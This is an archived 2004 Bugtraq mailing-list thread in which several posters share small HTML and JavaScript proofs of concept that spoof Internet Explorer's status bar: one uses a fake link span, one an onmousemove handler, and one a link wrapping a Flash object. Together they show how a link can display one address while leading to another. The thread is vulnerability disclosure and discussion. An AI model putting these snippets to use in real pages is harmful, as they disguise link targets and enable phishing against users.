RE: New URL spoofing bug in Microsoft Internet Explorer

To: "q q" <systemcracker@xxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: New URL spoofing bug in Microsoft Internet Explorer
From: "Michael Silk" <michaels@xxxxxxxxxx>
Date: Wed, 17 Nov 2004 15:25:05 +1100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcTMT/hYdVZRQwcZRkGhUpec7ZoZagADUT6g
Thread-topic: New URL spoofing bug in Microsoft Internet Explorer

Or even a fake "a" tag:

<span style="color: blue; text-decoration: underline; cursor: hand;"
onmouseover="window.status = 'http://www.msn.com/';"
onmouseout="window.status = 'Done.'" onclick="document.location =
'http://www.google.com'"> Visit Msn! </span> 

-----Original Message-----
From: q q [mailto:systemcracker@xxxxxxxxx] 
Sent: Wednesday, 17 November 2004 3:11 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer

I thought this was obvious, but having seen the amount of discussion,
here's another URL spoofer:

<a href="http://www.google.com";
onmousemove="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>

note that 

<a href="http://www.google.com";
onmouseover="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>

won't work - it seems MS have already half fixed this....

(tested on MSIE 6.0, winXP)

On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi
<roozbeh_afrasiabi@xxxxxxxxx> wrote:
> In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer>
> 
> Here is another way of spoofing the status bar:
> 
> <a> tag + <object> tag
> 
> <!--A HREF=http://www.yahoo.com><!--OBJECT
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
> 
>
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflas
h.cab#version=6,0,0,0"
> 
> WIDTH="300" HEIGHT="50" id="link" ALIGN="">
> 
> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > 
> <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu
> 
> VALU=FALSE>
> 
>  <EMBED src="link.swf" quality=high bgcolor=#FFFFFF  WIDTH="300"
HEIGHT="50" NAME="link" ALIGN=""
> 
> TYPE="application/x-shockwave-flash" 
> PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer";></EMBED>
> 
> </a></OBJECT></a>
> 
> *this method of spoofing the status bar allows malicious users to hide

> the target url from suspecting ppl ,demo page uses flash to generate
> 
> random urls.
> 
> demo:
> 
> http://www.persiax.com/pocs/statusbar/status.htm
> 
> 

--
PHP, mySQL Security and more at http://www.puremango.co.uk

**********************************************************************
This email message and accompanying data may contain information that is 
confidential and/or subject to legal privilege. If you are not the intended 
recipient, you are notified that any use, dissemination, distribution or 
copying of this message or data is prohibited. If you have received this email 
message in error, please notify us immediately and erase all copies of this 
message and attachments.

This email is for your convenience only, you should not rely on any information 
contained herein for contractual or legal purposes. You should only rely on 
information and/or instructions in writing and on company letterhead signed by 
authorised persons.
**********************************************************************

Prev by Date: SUSE Security Announcement: xshared, XFree86-libs, xorg-x11-libs (SUSE-SA:2004:041)
Next by Date: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
Previous by thread: Re: New URL spoofing bug in Microsoft Internet Explorer
Next by thread: [ GLSA 200410-30 ] GPdf, KPDF, KOffice: Vulnerabilities in included xpdf
Index(es):
- Date
- Thread